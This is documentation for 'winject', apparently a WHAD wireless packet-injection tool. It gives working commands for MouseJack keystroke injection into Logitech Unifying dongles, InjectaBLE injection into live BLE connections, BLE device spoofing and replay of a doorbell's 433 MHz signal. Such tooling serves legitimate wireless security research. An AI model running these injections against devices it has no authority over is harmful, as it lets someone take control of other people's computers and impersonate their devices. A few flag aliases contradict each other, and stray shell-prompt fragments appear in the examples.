winject: generic injection tool ================================ ``winject`` is a convenient tool to inject arbitrary data using various wireless protocols or wireless modulations. It supports any domain natively supported by WHAD and is able to inject arbitrary data in various formats: - PHY (raw demodulation) - Bluetooth Low Energy - IEEE 802.15.4 - Nordic Semiconductor's *Enhanced ShockBurst* (ESB) - Logitech's Unifying protocol Moreover, ``winject`` can be chained with other tools like ``wsniff`` or ``wplay`` to allow more complex data processing. Usage ----- .. code-block:: text winject [OPTIONS] DOMAIN [DOMAIN OPTIONS] [PACKETS] Command-line options ^^^^^^^^^^^^^^^^^^^^ **winject** supports the following options: * ``--interface`` (``-i``): specifies the WHAD interface to use to connect to the target device * ``--repeat`` (``-r``): repeat the transmission of packets * ``--delay DELAY`` (``-d DELAY``): delay between the transmission of two consecutive packets .. include:: debug-options.rst Specific PHY options ^^^^^^^^^^^^^^^^^^^^ * ``--frequency`` (``-f``): specifies the target frequency in Hz. This frequency must be in the device' supported frequencies range. * ``--little-endian`` (``-le``): will interpret bytes as little-endian (LSB first, default is *big-endian*). * ``--datarate`` (``-d``): set the data rate in number of bits per second (*bps*). * ``--packet-size`` (``-s``): set the maximum packet (or reception buffer) size in bytes. * ``--sync-word`` (``-w``): set a synchronization word (hex value expected) * ``--ask`` (``-ask``): select ASK (Amplitude Shift Keying) modulation * ``--gfsk`` (``-gfsk``): select GFSK (Gaussian Frequency Shift Keying) modulation * ``--bfsk`` (``-bfsk``): select BFSK (Binary Frequency Shift Keying) modulation * ``--qfsk`` (``-qfsk``): select QFSK (Quaternary Frequency Shift Keying) modulation * ``--bpsk`` (``-bfsk``): select BPSK (Binary Phase Shift Keying) modulation * ``--qpsk`` (``-qpsk``): select QPSK (Quadrature Phase Shift Keying) modulation * ``--lora`` (``-lora``): select LoRa (Semtech Long Range) modulation Specific FSK options ^^^^^^^^^^^^^^^^^^^^ * ``--deviation`` (``-dev``): frequency deviation in Hz Specific LoRa options ^^^^^^^^^^^^^^^^^^^^^ * ``--spreading-factor`` (``-sf``): set LoRa spreading factor * ``--coding-rate`` (``-cr``): set LoRa coding rate - ``44`` for 4/4 - ``45`` for 4/5 - ``46`` for 4/6 - ``47`` for 4/7 - ``48`` for 4/8 * ``--bandwidth`` (``-bw``): set LoRa bandwidth in Hz * ``--enable-crc`` (``-crc``): enable LoRa CRC * ``--enable-explicit_mode`` (``-em``): enable explicit mode Specific BLE options ^^^^^^^^^^^^^^^^^^^^ * ``--raw``: inject a packet directly * ``--inject-to-slave``: inject a packet to slave in a synchronized connection * ``--inject-to-master``: inject a packet to master in a synchronized connection * ``--synchronize`` (``-s``): synchronize with a connection before injection * ``--access-address`` (``-aa``): set the access address corresponding to a connection to target * ``--crc-init`` (``-crc``): set target connection CRC initial value * ``--hop-interval`` (``-int``): set target connection hop interval * ``--hop-increment`` (``-inc``): set target connection hop increment (CSA #1 only) * ``--channel-map`` (``-chm``): set channel map for the target connection * ``--channel`` (``-c``): select the channel to use for injection * ``--filter`` (``-f``): use the provided BD address for injection Specific ESB options ^^^^^^^^^^^^^^^^^^^^ * ``--channel`` (``-c``): select a channel (0-100) to use for injection * ``--address`` (``-f``): set a device address to use * ``--scanning`` (``-s``): scan channels before injecting ESB packets Specific Logitech Unifying options ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ * ``--channel`` (``-c``): select a channel (0-100) to use for injection * ``--address`` (``-f``): set a device address to use * ``--scanning`` (``-s``): scan channels before injecting Unifying packets Specific 802.15.4 options ^^^^^^^^^^^^^^^^^^^^^^^^^^ * ``--channel`` (``-c``): select a channel (11-26) to use for injection Specific ZigBee options ^^^^^^^^^^^^^^^^^^^^^^^^^^ * ``--channel`` (``-c``): select a channel (11-26) to use for injection Specific RF4CE options ^^^^^^^^^^^^^^^^^^^^^^^ * ``--channel`` (``-c``): select a channel (11-26) to use for injection Injecting scapy packets ^^^^^^^^^^^^^^^^^^^^^^^^ ``winject`` can use a WHAD-compatible device to inject arbitrary scapy packets. You can provide the configuration of a specific domain, and append a list of scapy packets afterwards. For example, the following command will build and inject a Logitech Unifying Mouse packet on the channel 62, using address "ca:e9:06:ec:a4": .. code-block:: text winject -i uart0 unifying -c 62 -f ca:e9:06:ec:a4 \ "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Mouse_Payload(button_mask=0x02)" Injected on the right channel with the right address, such injection should trigger a right click on the computer connected with the Unifying dongle. You can also provide multiple packets: .. code-block:: text winject -i uart0 unifying -c 71 -f ca:e9:06:ec:a4 \ "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('001400000000000000'))" \ "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('000000000000000000'))" If successful, this injection will inject an 'A' keypress then a key release on the computer connected with the Unifying dongle. Injecting raw buffers ^^^^^^^^^^^^^^^^^^^^^^ ``winject`` can also be used to inject arbitrary raw buffers, if the packets are provided as bytestrings. For example, you can inject an OOK-modulated packet using a Yard Stick One on frequency 433.92MHz using a datarate of 10000 bauds: .. code-block:: text winject -i yardstickone0 phy -f 433920000 -d 10000 --ask \ fff03e0003fff81fffc1f0000f80007fff07e0003e0001f0000f8000ff Injecting from a PCAP file ^^^^^^^^^^^^^^^^^^^^^^^^^^^ ``winject`` allow to use the output of an other tool, such as ``wplay`` which replays an existing PCAP file, as a source for traffic to inject. This feature allows to easily implement a replay attack using only command line tools. For example, let's implement a basic Logitech Unifying replay attack. Let's start by capturing some mouse packets from a Logitech Unifying mouse and dump them into a PCAP file: .. code-block:: text wsniff -i uart0 unifying -s -f ca:e9:06:ec:a4 | wdump /tmp/mouse.pcap Once packets have been captured, we can easily replay them from the PCAP file and inject them using the following command: .. code-block:: text wplay /tmp/mouse.pcap | winject -i uart0 -s -f ca:e9:06:ec:a4 .. warning:: Note that in the previous example, the domain (unifying) is not provided to winject nor wplay. This feature relies on the fact that by default, every PCAP captured by WHAD has its header patched to remember the corresponding domain. While this feature is convenient, note that any unpatched PCAP file (for example, if captured from another tool) will need to explicitely provide a domain after the PCAP filename. You can also force the interpretation of traffic as a specific domain by providing the domain explicitely in winject. Bluetooth Low Energy injection ------------------------------- ``winject`` provides specific features for injecting Bluetooth Low Energy packets: * injecting raw packets directly on a specific channel (can be used to replay advertisements) * injecting packets to Peripheral (Slave) in an existing connection, using InjectaBLE attack * injecting packets to Central (Master) in an existing connection, using InjectaBLE attack Injecting raw advertisements ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ``winject`` provides the ``--raw`` option, allowing to inject a packet directly on a given channel. This feature can be used to inject BLE advertisements. In this example, we transmit a BLE advertisement repeatedly every 0.05s on channel 37: .. code-block:: text $ winject -r -d 0.05 -i uart0 ble --raw -c 37 d6be898e022228537703d0d01bff75004204018060d0d003775328d2d0037753270100000000000005da96 [!] Transmitting: >>] |>>> Replaying advertisements from a PCAP file ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ You can also clone advertisements extracted from a PCAP file. Let's start by sniffing some BLE advertisements with ``wsniff`` while capturing them in a PCAP file: .. code-block:: text $ wsniff -o /tmp/advertisements.pcap -i uart0 ble -a [ raw=True, decrypted=False, timestamp=316370100, channel=37, rssi=-74, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >, >] |>>> [ raw=True, decrypted=False, timestamp=316375426, channel=37, rssi=-83, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >, >, >>] |>>> [ raw=True, decrypted=False, timestamp=316402700, channel=37, rssi=-85, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >>] |>>> [ raw=True, decrypted=False, timestamp=316417881, channel=37, rssi=-70, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >>] |>>> [...] Let's replay the device with BD address *'11:75:58:2a:f3:28'*, named *'TimeBox-Evo-audio'*. We will generate a pipeline of commands to perform the following actions: * ``wplay /tmp/advertisements.pcap``: Replay the content of the PCAP file /tmp/advertisements.pcap * ``wfilter "p.AdvA == '11:75:58:2a:f3:28'"``: Apply a filter to keep only traffic from the target device * ``-t "p.AdvA='11:22:33:44:55:66'"``: Apply a transformation to filtered packets to replace BD address by *'11:22:33:44:55:66'* * ``winject -r -d 0.01 -i uart0 --raw -c 37``: Inject the raw packets directly and repeatedly, every 0.01s on channel 37 The final command is: .. code-block:: text $ wplay /tmp/advertisements.pcap | \   ST 27   main  wfilter "p.AdvA == '11:75:58:2a:f3:28'" -t "p.AdvA='11:22:33:44:55:66'" | \ winject -r -d 0.01 -i uart0 --raw -c 37 [!] Transmitting: [ raw=True, decrypted=False, timestamp=7366, channel=37, rssi=-74, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >, >] |>>> [!] Transmitting: [ raw=True, decrypted=False, timestamp=31491, channel=37, rssi=-74, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >, >] |>>> [!] Transmitting: [ raw=True, decrypted=False, timestamp=55117, channel=37, rssi=-73, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ] >, >] |>>> [...] If we perform a BLE scan using another interface, we can observe our spoofed device in the output: .. code-block:: text $ wble-central -i hci0 scan RSSI Lvl Type BD Address Extra info [ -75 dBm] [RND] 62:94:29:b5:71:2d [ -90 dBm] [RND] 5d:c1:f0:56:b7:0a [ -77 dBm] [RND] df:de:71:72:db:74 name:"Expert_DFDE7172DB74" [ -85 dBm] [RND] 7b:b9:d0:d3:6e:ea name:"LE_WF-C500" [ -91 dBm] [RND] 5d:e8:88:36:fe:6d [ -43 dBm] [PUB] 11:22:33:44:55:66 name:"TimeBox-Evo-audio" Injecting packets into an established connection ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Some devices (mainly ButteRFly) allows to perform a BLE packet injection into an established connection, using InjectaBLE attack. Before performing the injection, you must synchronize with the connection (``--synchronize`` / ``-s``): ``winject`` will then wait a new connection and synchronize with it before performing the injection. If needed, you can apply a filter on a specific BD address using ``--filter``/``-m`` option. If you want to inject a BLE packet to Peripheral (Slave), use option ``--inject-to-slave``: .. code-block:: text winject -i uart0 ble -s -m 11:22:33:44:55:66 --inject-to-slave "BTLE()/BTLE_DATA()/L2CAP_Hdr()/ATT_Hdr()/ATT_Read_Request(gatt_handle=0x21)" You can also inject a BLE packet to Central (Peripheral) using option ``--inject-to-master``: .. code-block:: text winject -i uart0 ble -s -m 11:22:33:44:55:66 --inject-to-master "BTLE()/BTLE_DATA()/L2CAP_Hdr()/ATT_Hdr()/ATT_Handle_Value_Notification(gatt_handle=0x21, value=b'\x41\x42\x43')" 802.15.4, ZigBee & RF4CE Injection ------------------------------------ ``winject`` allows to easily inject 802.15.4 packets. The following command will inject a packet using 802.15.4 domain (dot15d4): .. code-block:: text $ winject -i uart0 dot15d4 -c 11 008021f4ec1700ff0f000000228ce33a7768bac3a278ffffff00f4f1   ST 27   main  [!] Transmitting: >] |>>> You can check that the packet is correctly transmitted using ``wsniff``: .. code-block:: text $ wsniff -i uart1 zigbee -c 11 [ decrypted=False, timestamp=3543855, channel=11, rssi=-54, is_fcs_valid=False, lqi=156 ] >>> Similarly, you can transmit ZigBee or RF4CE packets using respectively "zigbee" or "rf4ce" instead of dot15d4. ESB and Unifying Injection --------------------------- ``winject`` allows to easily inject ESB or Logitech Unifying packets. Injecting a single Unifying packet ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ For example, the following command will build and inject a Logitech Unifying Mouse packet on the channel 62, using address "ca:e9:06:ec:a4": .. code-block:: text winject -i uart0 unifying -c 62 -f ca:e9:06:ec:a4 \ "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Mouse_Payload(button_mask=0x02)" Injected on the right channel with the right address, such injection should trigger a right click on the computer connected with the Unifying dongle. Injecting multiple Unifying packet ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ You can also provide multiple packets: .. code-block:: text winject -i uart0 unifying -c 71 -f ca:e9:06:ec:a4 \ "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('001400000000000000'))" \ "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('000000000000000000'))" If successful, this injection will inject an 'A' keypress then a key release on the computer connected with the Unifying dongle, leveraging MouseJack Unencrypted Keystroke injection. Replaying a sniffed Unifying communication ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Let's start by capturing some mouse packets from a Logitech Unifying mouse while moving the mouse and dump them into a PCAP file: .. code-block:: text wsniff -i uart0 unifying -s -f ca:e9:06:ec:a4 | wdump /tmp/mouse.pcap Once the packet have been captured, we can easily replay them from the PCAP file and inject them using the following command: .. code-block:: text wplay /tmp/mouse.pcap | winject -i uart0 -s -f ca:e9:06:ec:a4 If everything works properly, you should see the captured mouse movement reproduced on your screen. Injecting raw ESB packet ^^^^^^^^^^^^^^^^^^^^^^^^^ You can inject raw packets directly. For example, the following command will inject a raw ESB Ping Request for device *'11:22:33:44:55'* on channel 15: .. code-block:: text $ winject -i uart0 esb -c 15 -f 11:22:33:44:55 "ESB_Hdr(address='11:22:33:44:55')/ESB_Payload_Hdr()/ESB_Ping_Request()"   ST 27   main  [!] Transmitting: >> You can monitor that the packet has been correctly transmitted using ``wsniff`` and another device: .. code-block:: text $ wsniff -i uart1 esb -c 15 -f 11:22:33:44:55 [ raw=True, decrypted=False, timestamp=3803020, channel=15, rssi=-17, is_crc_valid=True, address=11:22:33:44:55 ] >> Injecting arbitrary modulated data ------------------------------------ Using "phy" domain, it's possible to inject arbitrary data and use a dedicated modulation to transmit them. Injecting arbitrary data ^^^^^^^^^^^^^^^^^^^^^^^^^ For example, you can inject an OOK-modulated packet using a Yard Stick One on frequency 433.92MHz using a datarate of 10000 bauds: .. code-block:: text winject -i yardstickone0 phy -f 433920000 -d 10000 --ask \ fff03e0003fff81fffc1f0000f80007fff07e0003e0001f0000f8000ff Replaying an On-Off-Keying signal from a wireless doorbell ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Let's consider a simple replay attach, where we sniff a simple signal allowing to activate a wireless doorbell operating at 433.92MHz. First, let's sniff the signal using ``wsniff`` and record it in a PCAP file using ``wdump``: .. code-block:: text $ wsniff -i yardstickone0 phy -f 433920000 -d 10000 --ask | wdump /tmp/doorbell.pcap 32 packets have been dumped into /tmp/doorbell.pcap /!\ sniffer stopped (CTRL-C) Then, let's replay the PCAP file using ``wplay`` and inject the recorded signal using the same parameters using ``winject``: .. code-block:: text $ wplay /tmp/doorbell.pcap | winject -i yardstickone0 [!] Transmitting: [ raw=False, timestamp=96113, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ] [!] Transmitting: [ raw=False, timestamp=112135, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ] [!] Transmitting: [ raw=False, timestamp=128180, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ] [!] Transmitting: [ raw=False, timestamp=144230, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ] [!] Transmitting: [ raw=False, timestamp=160268, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ]